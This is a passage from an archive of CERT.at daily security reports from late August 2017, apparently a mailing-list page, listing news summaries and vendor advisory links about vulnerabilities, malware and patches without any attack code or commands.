http://www-01.ibm.com/support/docview.wss?uid=swg22007539 ∗∗∗ IBM Security Bulletin: IBM QRadar Network Security is affected by a less-secure algorithm during negotiations vulnerability (CVE-2017-1491) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22007535 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 31.08.2017
by Daily end-of-shift report 31 Aug '17

31 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 30-08-2017 18:00 − Donnerstag 31-08-2017 18:00 Handler: Robert Waldner Co-Handler: Olaf Schwarz ===================== = News = ===================== ∗∗∗ Dissecting the Chrome Extension Facebook malware ∗∗∗ --------------------------------------------- The Facebook malware that spread last week was dissected in a collaboration with Kaspersky Lab and Detectify. We were able to get help from the involved companies and cloud services to quickly shut down parts of the attack to mitigate it as fast as possible. --------------------------------------------- http://securelist.com/dissecting-the-chrome-extension-facebook-malware/8171… ∗∗∗ Cyber Security Assessment Netherlands 2017: Digital resilience is lagging behind the increasing threat ∗∗∗ --------------------------------------------- The digital resilience of individuals and organisations is lagging behind the increasing threat. Government, business and citizens take many steps to increase digital resilience, but this is not happening fast enough. This is apparent from the Cyber Security Assessment Netherlands 2017 (CSAN 2017), which demissionary State Secretary Dijkhoff sent to parliament in June and which is being published in English today. --------------------------------------------- https://www.ncsc.nl/english/current-topics/news/cyber-security-assessment-n… ∗∗∗ A Framework for Cyber Security Insurance ∗∗∗ --------------------------------------------- New paper: "Policy measures and cyber insurance: a framework," by Daniel Woods and Andrew Simpson, Journal of Cyber Policy, 2017.Abstract: The role of the insurance industry in driving improvements in cyber security has been identified as mutually beneficial for both insurers and policy-makers. To date, there has been no consideration of the roles governments and the insurance industry should pursue in support of this public-private partnership. --------------------------------------------- https://www.schneier.com/blog/archives/2017/08/a_framework_for.html ∗∗∗ Mining Adminers – Hackers Scan the Internet For DB Scripts ∗∗∗ --------------------------------------------- Hackers are constantly scanning the internet for exploitable sites, which is why even small, new sites should be fully patched and protected. At the same time, it is not feasible to scan the whole internet with 330+ million domains and billions of web pages. Even Google can’t do it, but hackers are always getting better at reconnaissance. Despite these limitations, scanning just 1% of the internet allows attackers to discover thousands of vulnerable sites. --------------------------------------------- https://blog.sucuri.net/2017/08/mining-adminers-hackers-scan-the-internet-f… ∗∗∗ Herzschrittmacher von St. Jude Medical: Firmware-Patches gegen Sicherheitslücken ∗∗∗ --------------------------------------------- Versierte Hacker können Herzschrittmacher der Marke Abbott angreifen, um Befehle auszuführen und Patientendaten zu stehlen. Implantatträgern wird ein baldiger Arztbesuch empfohlen, um wichtige Firmware-Updates zu installieren. --------------------------------------------- https://heise.de/-3817954 ∗∗∗ Embedded IoT: Krypto-Bibliothek mbed TLS für Lauschattacken anfällig ∗∗∗ --------------------------------------------- Unter gewissen Umständen könnten Angreifer als Man in the Middle den Informationsaustausch von Geräten, die auf mbed TLS setzen, mitschneiden. Abgesicherte Versionen stehen bereit. --------------------------------------------- https://heise.de/-3819197 ∗∗∗ Vulnerability Spotlight: Multiple Gdk-Pixbuf Vulnerabilities ∗∗∗ --------------------------------------------- Today, Talos is disclosing the discovery of two remote code execution vulnerabilities which have been identified in the Gdk-Pixbuf Toolkit. This toolkit used in multiple desktop applications including Chromium, Firefox, GNOME thumbnailer, VLC and others. Exploiting this vulnerability allows an attacker to gain full control over the victims machine. --------------------------------------------- http://blog.talosintelligence.com/2017/08/vuln-spotlight-multiple-gdk.html ===================== = Advisories = ===================== ∗∗∗ IBM Security Bulletin: IBM PowerVC is impacted by OpenStack Compute denial of service vulnerability (CVE-2016-7498) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=nas8N1022227 ∗∗∗ IBM Security Bulletin: Vulnerability in libtirpc affects Power Hardware Management Console (CVE-2017-8779) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=nas8N1022176 ∗∗∗ IBM Security Bulletin: Vulnerabilities in BIND affect Power Hardware Management Console ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=nas8N1022177 ∗∗∗ IBM Security Bulletin: IBM PowerVC is impacted by python oslo.middleware package information disclosure (CVE-2017-2592) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=nas8N1022229 ∗∗∗ IBM Security Bulletin: IBM PowerVC is impacted by OpenStack Glance server-side request forgery (CVE-2017-7200) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=nas8N1022228 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM® Java SDK affects WebSphere Application Server July 2017 CPU that is bundled with IBM WebSphere Application Server Patterns and IBM WebSphere Application Server for Cloud. ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22007046 ∗∗∗ IBM Security Bulletin: Multiple Vulnerabilities in IBM® Java SDK affects WebSphere Application Server July 2017 CPU ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22007002 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 30.08.2017
by Daily end-of-shift report 30 Aug '17

30 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Dienstag 29-08-2017 18:00 − Mittwoch 30-08-2017 18:00 Handler: Robert Waldner Co-Handler: n/a ===================== = News = ===================== ∗∗∗ WireX: Google entfernt 300 DDoS-Apps aus dem Playstore ∗∗∗ --------------------------------------------- Google hat ein DDoS-Botnetz aus Android-Geräten lahmgelegt - und dazu 300 Apps aus dem Playstore entfernt. Rund 70.000 Smartphones wurden infiziert. (DoS, Virus) --------------------------------------------- https://www.golem.de/news/wirex-google-entfernt-300-ddos-apps-aus-dem-plays… ∗∗∗ Introducing WhiteBear ∗∗∗ --------------------------------------------- As a part of our Kaspersky APT Intelligence Reporting subscription, customers received an update in mid-February 2017 on some interesting APT activity that we called WhiteBear. It is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private report. Like previous Turla activity, WhiteBear leverages compromised websites and hijacked satellite connections for command and control (C2) infrastructure. --------------------------------------------- http://securelist.com/introducing-whitebear/81638/ ∗∗∗ Security baseline for Windows 10 “Creators Update” (v1703) – FINAL ∗∗∗ --------------------------------------------- Microsoft is pleased to announce the final release of the recommended security configuration baseline settings for Windows 10 “Creators Update,” also known as version 1703, “Redstone 2,” or RS2. The downloadable attachment to this blog post includes importable GPOs, tools for applying the GPOs, custom ADMX files for Group Policy settings, and all the settings in spreadsheet... --------------------------------------------- https://blogs.technet.microsoft.com/secguide/2017/08/30/security-baseline-f… ∗∗∗ Proof that HMAC-DRBG has No Back Doors ∗∗∗ --------------------------------------------- New research: "Verified Correctness and Security of mbedTLS HMAC-DRBG," by Katherine Q. Ye, Matthew Green, Naphat Sanguansin, Lennart Beringer, Adam Petcher, and Andrew W. Appel.Abstract: We have formalized the functional specification of HMAC-DRBG (NIST 800-90A), and we have proved its cryptographic security -- that its output is pseudorandom -- using a hybrid game-based proof. --------------------------------------------- https://www.schneier.com/blog/archives/2017/08/proof_that_hmac.html ===================== = Advisories = ===================== ∗∗∗ Update to Security Bulletin (APSB17-24) ∗∗∗ --------------------------------------------- The Security Bulletin (APSB17-24) published on August 8 regarding updates for Adobe Acrobat and Reader has been updated to reflect the availability of new updates as of August 29. The August 29 updates resolve a functional regression with XFA forms functionality … --------------------------------------------- https://blogs.adobe.com/psirt/?p=1484 ∗∗∗ DFN-CERT-2017-1525: Wireshark: Mehrere Schwachstellen ermöglichen Denial-of-Service-Angriffe ∗∗∗ --------------------------------------------- Mehrere Schwachstellen in Wireshark können von einem entfernten, nicht authentisierten Angreifer für verschiedene Denial-of-Service (DoS)-Angriffe ausgenutzt werden. Die Ausnutzung der Schwachstellen erfordert die Verarbeitung speziell präparierter Datenpakete oder Packet-Trace-Dateien mit den Dissektoren für IrCOMM, Modbus, Profinet I/O oder MSDP. --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1525/ ∗∗∗ DFN-CERT-2017-1523: Libgcrypt: Eine Schwachstelle ermöglicht das Ausspähen von Informationen ∗∗∗ --------------------------------------------- Eine Schwachstelle in Libgcrypt ermöglicht einem lokalen, einfach authentisierten Angreifer das Ausspähen privaten Schlüsselmaterials. Das GnuPG-Projekt hat die Schwachstelle in den Versionen 1.7.9 und 1.8.1 behoben. Der Quellcode dieser Versionen steht zum Herunterladen zur Verfügung. --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1523/ ∗∗∗ Multiple vulnerabilities in RubyGems ∗∗∗ --------------------------------------------- The following vulnerabilities have been reported. * a DNS request hijacking vulnerability * an ANSI escape sequence vulnerability * a DoS vulernerability in the query command * a vulnerability in the gem installer that allowed a malicious gem to overwrite arbitrary files --------------------------------------------- https://www.ruby-lang.org/en/news/2017/08/29/multiple-vulnerabilities-in-ru… ∗∗∗ Cisco unveils LabVIEW code execution flaw that won’t be patched ∗∗∗ --------------------------------------------- LabVIEW, the widely used system design and development platform developed by National Instruments, sports a memory corruption vulnerability that could lead to code execution. LabVIEW is commonly used for building data acquisition, instrument control, and industrial automation systems on a variety of operating systems: Windows, macOS, Linux and Unix. The vulnerability (CVE-2017-2779) The vulnerability was discovered by Cory Duplantis of Cisco Talos earlier this year, and reported to the company. --------------------------------------------- https://www.helpnetsecurity.com/2017/08/30/labview-code-execution-flaw/ ∗∗∗ Abbott Laboratories’ Accent/Anthem, Accent MRI, Assurity/Allure, and Assurity MRI Pacemaker Vulnerabilities ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSMA-17-241-01 ∗∗∗ AzeoTech DAQFactory ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-241-01 ∗∗∗ Advantech WebAccess ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02 ∗∗∗ Security Advisory - Improper Authentication Vulnerability in The FusionSphere OpenStack ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170830-… ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Algo Credit Manager ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22007392 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities may affect IBM® SDK, Java™ Technology Edition ∗∗∗ --------------------------------------------- https://www.ibm.com/support/docview.wss?uid=swg22006695 ∗∗∗ IBM Security Bulletin: Vulnerabilities in httpd affect Power Hardware Management Console ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=nas8N1022175 ∗∗∗ IBM Security Bulletin: Vulnerability in IBM WebSphere Application Server affects Power Hardware Management Console (CVE-2017-1194) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=nas8N1022178 ∗∗∗ IBM Security Bulletin: IBM Transformation Extender Advanced and IBM Standards Processing Engine are susceptible to a vulnerability in 10x (CVE-2017-1152) ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22004796 ∗∗∗ ImageMagick Heap Overflow in TracePoint() in Processing Files Lets Remote Users Execute Arbitrary Code ∗∗∗ --------------------------------------------- http://www.securitytracker.com/id/1039246 ∗∗∗ SSA-535640 (Last Update 2017-08-30): Vulnerability in Industrial Products ∗∗∗ --------------------------------------------- https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-535640… ∗∗∗ SSA-771218 (Last Update 2017-08-30): Vulnerability in 7KM PAC Switched Ethernet PROFINET expansion module from the SENTRON portfolio ∗∗∗ --------------------------------------------- https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-771218… ∗∗∗ SSA-087240 (Last Update 2017-08-30): Vulnerabilities in SIEMENS LOGO! ∗∗∗ --------------------------------------------- https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-087240… ∗∗∗ HPESBGN03765 rev.2 - HPE LoadRunner and HPE Performance Center, Remote Disclosure of Information ∗∗∗ --------------------------------------------- https://h20565.www2.hpe.com/portal/site/hpsc/template.PAGE/action.process/p… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 29.08.2017
by Daily end-of-shift report 29 Aug '17

29 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Montag 28-08-2017 18:00 − Dienstag 29-08-2017 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Metadata From IoT Traffic Exposes In-Home User Activity ∗∗∗ --------------------------------------------- Metadata from web traffic generated by smart devices installed in a home can reveal quite a lot of information about the owners habits and lifestyle. [...] --------------------------------------------- https://www.bleepingcomputer.com/news/technology/metadata-from-iot-traffic-… ∗∗∗ "Die ganzen Kosten und Risiken trägt im Moment der Kunde" ∗∗∗ --------------------------------------------- Das absolut Mindeste muss sein, dass der Hersteller für alle Sicherheitslücken für den gesamten Nutzungszeitraum der Software Patches für Sicherheitslücken zur Verfügung stellen muss. Wenn es nach mir ginge, bekäme der Kunde eine Pauschale pro Arbeitsplatz und Tag ohne Patch ausgezahlt, und zwar nicht seit das Sicherheitsloch öffentlich bekannt wurde, sondern – wenn das vorher war – seit der Hersteller davon wusste. --------------------------------------------- https://www.eco.de/2017/news/die-ganzen-kosten-und-risiken-traegt-im-moment… ∗∗∗ Android und Windows: MTP-Bug lässt Dateien verschwinden ∗∗∗ --------------------------------------------- Vorsicht mit Android-Geräten, die per USB an einen PC mit Windows 10 angeschlossen sind: Bei harmlosen Aufräumarbeiten können Fotos und andere Dateien unwiderruflich verloren gehen. Betroffen sind fast alle Android-Geräte außer den neueren von Samsung. --------------------------------------------- https://heise.de/-3815535 ∗∗∗ Tech Firms Team Up to Take Down ‘WireX’ Android DDoS Botnet ∗∗∗ --------------------------------------------- A half dozen technology and security companies -- some of them competitors -- issued the exact same press release today. This unusual level of cross-industry collaboration caps a successful effort to dismantle WireX, an extraordinary new crime machine comprising tens of thousands of hacked Android mobile devices that was used this month to launch a series of massive cyber attacks. Experts involved in the takedown warn that WireX marks the emergence of a new class of attack tools that are more --------------------------------------------- https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-a… ∗∗∗ BSI-Studie zur Analyse des Linux-Zufallszahlengenerators wird fortgesetzt ∗∗∗ --------------------------------------------- Im Rahmen einer Langzeitstudie untersucht das Bundesamt für Sicherheit in der Informationstechnik (BSI) seit 2012 die kryptografische Eignung des Linux-Zufallszahlengenerators "/dev/random". Der aktuelle Untersuchungsbericht umfasst sowohl den aktuellen als auch alle vorigen Linux-Kernel und steht in englischer Sprache auf der BSI-Webseite zum Download zur Verfügung. --------------------------------------------- https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2017/Studie_Linu… ===================== = Advisories = ===================== ∗∗∗ DSA-3958 fontforge - security update ∗∗∗ --------------------------------------------- It was discovered that FontForge, a font editor, did not correctlyvalidate its input. An attacker could use this flaw by tricking a userinto opening a maliciously crafted OpenType font file, thus causing adenial-of-service via application crash, or execution of arbitrary code. --------------------------------------------- https://www.debian.org/security/2017/dsa-3958 ∗∗∗ DSA-3957 ffmpeg - security update ∗∗∗ --------------------------------------------- Several vulnerabilities have been discovered in FFmpeg, a multimediaplayer, server and encoder. These issues could lead to Denial-of-Serviceand, in some situation, the execution of arbitrary code. --------------------------------------------- https://www.debian.org/security/2017/dsa-3957 ∗∗∗ VU#403768: Akeo Consulting Rufus fails to update itself securely ∗∗∗ --------------------------------------------- http://www.kb.cert.org/vuls/id/403768 ∗∗∗ DFN-CERT-2017-1514: MISP: Eine Schwachstelle ermöglicht einen Cross-Site-Scripting-Angriff ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1514/ ∗∗∗ DFN-CERT-2017-1512: OpenSSL: Eine Schwachstelle ermöglicht das Darstellen falscher Informationen ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1512/ ∗∗∗ DFN-CERT-2017-1515: Ghostscript: Mehrere Schwachstellen ermöglichen verschiedene Denial-of-Service-Angriffe ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1515/ ∗∗∗ DFN-CERT-2017-1517: SQLite: Eine Schwachstelle ermöglicht einen Denial-of-Service-Angriff ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1517/ ∗∗∗ Security Advisory - Two Vulnerabilities in Smart Phones ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170807-… ∗∗∗ Security Advisory - App Lock Bypass Vulnerability in Huawei Mobile Phones ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170829-… ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK 7 affect IBM Systems Director. ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=isg3T1025659 ∗∗∗ Pulse Connect Secure Access Control Flaw in diag.cgi Lets Remote Users Conduct Cross-Site Request Forgery Attacks ∗∗∗ --------------------------------------------- http://www.securitytracker.com/id/1039242 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 28.08.2017
by Daily end-of-shift report 28 Aug '17

28 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Freitag 25-08-2017 18:00 − Montag 28-08-2017 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl ===================== = News = ===================== ===================== = Advisories = ===================== ∗∗∗ Disabling Intel ME 11 via undocumented mode ∗∗∗ --------------------------------------------- .. researchers has delved deep into the internal architecture of Intel Management Engine (ME) 11, revealing a mechanism that can disable Intel ME after hardware is initialized and the main processor starts. In this article, we describe how we discovered this undocumented mode and how it is connected with the U.S. governments High Assurance Platform (HAP) program. --------------------------------------------- http://blog.ptsecurity.com/2017/08/disabling-intel-me.html ∗∗∗ Security Advisory - Two Vulnerabilities in Smart Phones ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2017 /huawei-sa-20170807-01-smartphone-en ∗∗∗ IBM Security Bulletin: OpenSSL Security Advisory [22 Sep 2016 ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=ssg1S1010571 ∗∗∗ IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM Sametime Community Server ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22006228 ∗∗∗ IBM Security Bulletin: IBM Cognos Analytics is affected by multiple vulnerabilities ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22007242 ∗∗∗ IBM Security Bulletin: A vulnerability in IBM Sametime Web Player (CVE-2016-2980) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22006447 ∗∗∗ IBM Security Bulletin: Security vulnerabilities in IBM Sametime Connect client (CVE-2016-0243, CVE-2016-2974) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22006444 ∗∗∗ IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM Cisco SAN switches and directors (CVE-2016-2108, CVE-2016-2107, CVE-2016-2105, CVE-2016-2106, CVE-2016-2109, CVE-2016-2176) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=ssg1S1010566 ∗∗∗ IBM Security Bulletin: Various Security Vulnerabilities in IBM Sametime Proxy Server ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22006441 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 25.08.2017
by Daily end-of-shift report 25 Aug '17

25 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 24-08-2017 18:00 − Freitag 25-08-2017 18:00 Handler: Olaf Schwarz Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Researcher Releases Fully Working Exploit Code for iOS Kernel Vulnerability ∗∗∗ --------------------------------------------- Adam Donenfeld, a researcher with mobile security firm Zimperium, has published today proof-of-concept code for zIVA — a kernel exploit that affects iOS 10.3.1 and previous versions. --------------------------------------------- https://www.bleepingcomputer.com/news/security/researcher-releases-fully-wo… ∗∗∗ New EMPTY CryptoMix Ransomware Variant Released ∗∗∗ --------------------------------------------- Today, MalwareHunterTeam discovered a new variant of the CryptoMix ransomware that is appending the .EMPTY extension to encrypted file names. Considering that the previous variant used ERROR as the previous extension and now uses EMPTY, it is clear that the developers are running out of extensions to use. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-empty-cryptomix-ransomwa… ∗∗∗ Mobile malware factories: Android apps for creating ransomware ∗∗∗ --------------------------------------------- Mobile ransomware can now be created automatically without the need to write code. Having little to no coding experience is no longer a problem for wannabe mobile malware authors, thanks to Trojan Development Kits (TDKs). Criminals can now install an app that will allow them to quickly and easily create Android ransomware with their own devices. --------------------------------------------- https://www.symantec.com/connect/blogs/mobile-malware-factories-android-app… ∗∗∗ Analysis of Ronggolawe Ransomware and How to Block It ∗∗∗ --------------------------------------------- ... Web server ransomware is not new. In fact we witnessed first evidence of it back at 2015 and most recently in the well-known attack aimed at the South Korean web hosting company NAYANA. Unfortunately, today ransomware targeted at web servers is even more popular especially given the availability of open source malware easily found in public repositories such as GitHub. Most recently we have seen reports of a new web server ransomware called Ronggolawe, the code name for AwesomeWare. --------------------------------------------- https://www.imperva.com/blog/2017/08/ronggolawe-ransomware-how-to-block-it/ ∗∗∗ The Adventure of the Final Intel AMT Problem ∗∗∗ --------------------------------------------- Its high time to learn how cunning cyber criminals can use Intel AMT powerful capabilities to achieve their malicious goals. See the captivating story of hacking Intel AMT with all its twists and turns and awe-inspiring details with your own eyes. The freshest and the hottest presentation “MythBusters: CVE-2017-5689 – How Intel AMT could be broken completely” from HITB 2017. --------------------------------------------- https://embedi.com/news/adventure-final-intel-amt-problem ∗∗∗ Sophos UTM: Update kümmert sich um alte und neue Sicherheitslücken ∗∗∗ --------------------------------------------- In der UTM von Sophos klaffen mehrere Schwachstellen. Eine fehlerbereinigte Version steht zum Download bereit. --------------------------------------------- https://heise.de/-3812308 ∗∗∗ Android Oreo: Das sind die Sicherheits-Neuerungen bei Android 8.0 ∗∗∗ --------------------------------------------- Google härtet Android mit Google Play Protect, Schutzfunktionen für die System-UI, strikteren Regeln für nachgeladenen Code aus Drittquellen und erweiterter Isolierung von Browser-Prozessen. --------------------------------------------- https://heise.de/-3812341 ===================== = Advisories = ===================== ∗∗∗ ZDI-17-697: (0Day) Delta Industrial Automation WPLSoft dvp File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation WPLSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-17-697/ ∗∗∗ ESB-2017.2137 - [Appliance] WPLSoft, ISPSoft and PMSoft ∗∗∗ --------------------------------------------- This bulletin contains ten (10) Zero Day Initiative security advisories. --------------------------------------------- https://www.auscert.org.au/bulletins/51578/print ∗∗∗ Westermo MRD-305-DIN, MRD-315, MRD-355, and MRD-455 ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-236-01 ∗∗∗ Rockwell Automation Allen-Bradley Stratix and ArmoStratix ∗∗∗ --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-17-208-04 ∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM MQ Light ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22007508 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 24.08.2017
by Daily end-of-shift report 24 Aug '17

24 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 23-08-2017 18:00 − Donnerstag 24-08-2017 18:00 Handler: Olaf Schwarz Co-Handler: n/a ===================== = News = ===================== ∗∗∗ 90% of Companies Get Attacked with Three-Year-Old Vulnerabilities ∗∗∗ --------------------------------------------- A Fortinet report released this week highlights the importance of keeping secure systems up to date, or at least a few cycles off the main release, albeit this is not recommended, but better than leaving systems unpatched for years. --------------------------------------------- https://www.bleepingcomputer.com/news/security/90-percent-of-companies-get-… ∗∗∗ Whatsapp und Signal: Zerodium bietet 500.000 US-Dollar für Messenger-Exploits ∗∗∗ --------------------------------------------- Die staatliche Nachfrage nach Sicherheitslücken für die Quellen-TKÜ zeigt offenbar Wirkung. Schwachstellen in Whatsapp, Signal und anderen Messengern werden besser honoriert als Codeausführung in Windows. --------------------------------------------- https://www.golem.de/news/whatsapp-und-signal-zerodium-bietet-500-000-us-do… ∗∗∗ Deprecated, Insecure Apple Authorization API Can Be Abused to Run Code at Root ∗∗∗ --------------------------------------------- An insecure Apple authorization API is used by numerous popular third-party application installers and can be abused by attackers ro run code as root. --------------------------------------------- http://threatpost.com/deprecated-insecure-apple-authorization-api-can-be-ab… ∗∗∗ Decrypting NotPetya/Petya: Tools for Recovering Your MFT After an Attack ∗∗∗ --------------------------------------------- In this blog post, we are making our findings, and tools, for decrypting NotPetya/Petya available to the general public. With the aid of the supplied tools, almost all of the Master File Table (MFT) can be successfully recovered within minutes. --------------------------------------------- https://www.crowdstrike.com/blog/decrypting-notpetya-tools-for-recovering-y… ∗∗∗ Im giving up on HPKP ∗∗∗ --------------------------------------------- HTTP Public Key Pinning is a very powerful standard that allows a host to instruct a browser to only accept certain public keys when communicating with it for a given period of time. Whilst HPKP can offer a lot of protection, it can also cause a lot of harm too. --------------------------------------------- https://scotthelme.co.uk/im-giving-up-on-hpkp/ ∗∗∗ Crystal Finance Millennium used to spread malware ∗∗∗ --------------------------------------------- [...] it was revealed the Crystal Finance Millennium website was indeed hacked, and serving three different flavors of malware. In this short blog post, well take a look at the malware variants that were distributed, and provide minimal background. --------------------------------------------- https://bartblaze.blogspot.de/2017/08/crystal-finance-millennium-used-to.ht… ∗∗∗ Malware über Facebook-Messenger im Umlauf, greift Windows und macOS an ∗∗∗ --------------------------------------------- Sicherheitsforscher warnen aktuell vor einer Masche, mit der Facebook-Nutzer dazu verleitet werden sollen, trojanisierte Fake-Software zu installieren. --------------------------------------------- https://heise.de/-3811842 ∗∗∗ Kritische Sicherheitslücke in HPE iLo: "So schnell wie möglich handeln" ∗∗∗ --------------------------------------------- Die Management-Software Integrated Lights-out 4 (iLO 4) von HP-Proliant-Servern enthält eine Sicherheitslücke, über die Angreifer aus der Ferne Schadcode ausführen können, ohne sich anmelden zu müssen. --------------------------------------------- https://heise.de/-3811873 ===================== = Advisories = ===================== ∗∗∗ Cisco Meeting Server Command Injection and Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- A vulnerability in the CLI command-parsing code of Cisco Meeting Server could allow an authenticated, local attacker to perform command injection and escalate their privileges to root. The attacker must first authenticate to the application with valid administrator credentials.The vulnerability is due to insufficient validation of user-supplied input at the CLI for certain commands. --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ DFN-CERT-2017-1497/">Cacti: Zwei Schwachstellen ermöglichen Cross-Site-Scripting-Angriffe ∗∗∗ --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2017-1497/ ∗∗∗ IBM Security Bulletin: A vulnerability in IBM Java SDK affects Sametime Community (CVE-2016-2183) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22006212 ∗∗∗ IBM Security Bulletin: Vulnerability found in OpenSSL release used by Windows and z/OS Security Identity Adapters ∗∗∗ --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg22007428 ∗∗∗ IBM Security Bulletin: Various Security vulnerabilities in IBM Sametime Media Server (CVE-2016-2970, CVE-2016-0729, CVE-2016-4449) ∗∗∗ --------------------------------------------- http://www.ibm.com/support/docview.wss?uid=swg22006233 ∗∗∗ HPESBHF03769 rev.1 - HPE Integrated Lights-out 4 (iLO 4) Multiple Remote Vulnerabilities ∗∗∗ --------------------------------------------- https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=e… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 23.08.2017
by Daily end-of-shift report 23 Aug '17

23 Aug '17

===================== = End-of-Day report = ===================== Timeframe: Dienstag 22-08-2017 18:00 − Mittwoch 23-08-2017 18:00 Handler: Olaf Schwarz Co-Handler: n/a ===================== = News = ===================== ∗∗∗ ROPEMAKER Lets Attackers Change Your Emails After Delivery ∗∗∗ --------------------------------------------- A new email attack scenario nicknamed ROPEMAKER allows a threat actor to change the content of emails received by targets via remote CSS files. --------------------------------------------- https://www.bleepingcomputer.com/news/security/ropemaker-lets-attackers-cha… ∗∗∗ Google Play Store Security Scans Tricked by ...Sigh... In-Dev Malware ∗∗∗ --------------------------------------------- Google has yet to remove two apps infected with dangerous malware that are currently still available for download via the official Google Play Store. --------------------------------------------- https://www.bleepingcomputer.com/news/security/google-play-store-security-s… ∗∗∗ Malicious script dropping an executable signed by Avast?, (Wed, Aug 23rd) ∗∗∗ --------------------------------------------- Yesterday, I found an interesting sample that I started to analyze... It reached my spam trap attached to an email in Portuguese with the subject: "Venho por meio desta solicitar orçamento dos produtos” ("I hereby request the products budget”). --------------------------------------------- https://isc.sans.edu/diary/rss/22748 ∗∗∗ Apple iCloud Keychain easily slurped, ElcomSoft says ∗∗∗ --------------------------------------------- Credentials stored in the cloud succumb to 